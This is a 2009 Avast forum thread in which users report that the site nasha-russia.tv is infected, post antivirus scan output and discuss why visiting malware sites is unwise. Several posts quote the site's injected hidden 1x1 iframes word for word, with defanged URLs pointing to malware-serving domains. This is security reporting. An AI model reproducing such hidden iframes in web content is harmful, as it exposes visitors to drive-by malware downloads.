Avast WEBforum

Other => Viruses and worms => Topic started by: sewaq on April 29, 2009, 01:27:06 PM

Title: nasha-russia.tv - HTML:Iframe-inf
Post by: sewaq on April 29, 2009, 01:27:06 PM

hxxp://nasha-russia.tv/

Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: Omid Farhang on April 29, 2009, 01:35:27 PM

A virus or unwanted program has been detected
in the HTTP data on the requested page.

Requested URL:   hxxp://nasha-russia.tv/
Information:        Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus

Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: polonus on April 29, 2009, 09:56:25 PM

Hi sewaq,

DrWeb's av link checker gives it as red - infected -
Checking: hxtp://nasha-russia.tv/
Engine version: 5.0.0.12182
Total virus-finding records: 539455
File size: 45.05 KB
File MD5: 4c7dd71d5934d7cab5a3aeefe3dfd339

hxtp://nasha-russia.tv/ - archive HTML
>hxttp://nasha-russia.tv//JavaScript.0 - Ok
>hxtp://nasha-russia.tv//Script.1 - Ok
>hxtp://nasha-russia.tv//Script.2 - Ok
>hxtp://nasha-russia.tv//Script.3 - Ok
>hxtp://nasha-russia.tv//Script.4 - Ok
>hxtp://nasha-russia.tv//Script.5 - Ok
>hxtp://nasha-russia.tv//JavaScript.6 - Ok
>hxtp://nasha-russia.tv//JavaScript1.1.7 - Ok
>hxtp://nasha-russia.tv//JavaScript1.2.8 - Ok
>hxtp://nasha-russia.tv//JavaScript1.3.9 - Ok
>hxtp://nasha-russia.tv//JavaScript.10 - Ok
>hxtp://nasha-russia.tv//JavaScript.11 - Ok
hxtp://nasha-russia.tv/ - Ok

Checking: hxtp://pagead2.googlesyndication.com/pagead/show_ads.js
File size: 29.44 KB
File MD5: 24c7aba78e61147132b46e48e6743e71

hxtp://pagead2.googlesyndication.com/pagead/show_ads.js - Ok

Checking: hxtp://lotbetworld.cn/in.cgi?income36
File size: 8978 bytes
File MD5: 98ccf1db761c14c99d26177ac88722b1

hxtp://lotbetworld.cn/in.cgi?income36 - archive MAIL
xttp://lotbetworld.cn/in.cgi?income36/ - archive HTML
>hxtp://lotbetworld.cn/in.cgi?income36//Script.0 infected with Trojan.DownLoad.35036

Checking: hxtp://nasha-russia.tv/includes/jscript.js
File size: 2849 bytes
File MD5: 50f24195e48db586910fffb5f7f5a614

hxtp://nasha-russia.tv/includes/jscript.js - Ok
Re: hxtp://virusinfo.info/showthread.php?t=44061

polonus

Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: CharleyO on April 29, 2009, 10:12:28 PM

***

Well, Polonus beat me to it but here is a little more information.

One iframe infection is outside the html tag at the top of the page and looks like this :

<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
(I changed the http to hxxp to disable the link)

I counted at least 12 javascript infections through out the page.

There are 2 more iframe infections outside the html tag at the bottom of the page :

<iframe src="hxxp://google-ana1yticz.com/?click=486812" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>

Click the images below to enlarge.


***

Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: !Donovan on April 29, 2009, 10:36:53 PM

Went to the site without pro version and got infected. :-X

Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: CharleyO on April 30, 2009, 12:52:59 AM

***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***

Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: !Donovan on April 30, 2009, 02:16:20 AM

Quote from: CharleyO on April 30, 2009, 12:52:59 AM

***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***

I wanted to see what the virus does. ;D Besides, I think I can remove the virus vai Boot-Time Scanning!

Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: polonus on April 30, 2009, 02:32:31 AM

Hi Donovansrb10,

People that download viruses to see what they do aren't just average users. These people download viruses in a special lab settings, where they cannot infect outside a virtual machine. They have to take a lot of precautions and need a lot of special analyzing tools. Well if you download Vitro file infector, you can see what is meant, if you do that you can completely f-disk, format and re-install your Operational System, so-called total recall, not a nice thing to experience, seeing your computer being ruined by a virus. Malware is no plaything, and malware should be kept from computers by all means. The real hero here is the man or woman or kid that did not have a virus for years and years, because he or she or it is computer-savvy and security aware,

polonus

Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: DavidR on April 30, 2009, 03:19:46 AM

That goes double when you have absolutely no idea what the payload at the other end of the link could be.

One member who I would also say is more experienced tried this and with out a robust back-up and recovery strategy (hard disk imaging, etc.) he ended formatting his system and reinstalling everything. What he got hit by was Vitro/Virut and you only have to check this forum to see the destruction it reaps with most ending up on a fdisk, format and reinstall.

So this strategy is IMHO totally stupid, unless you are on a test machine that you wipe after the test.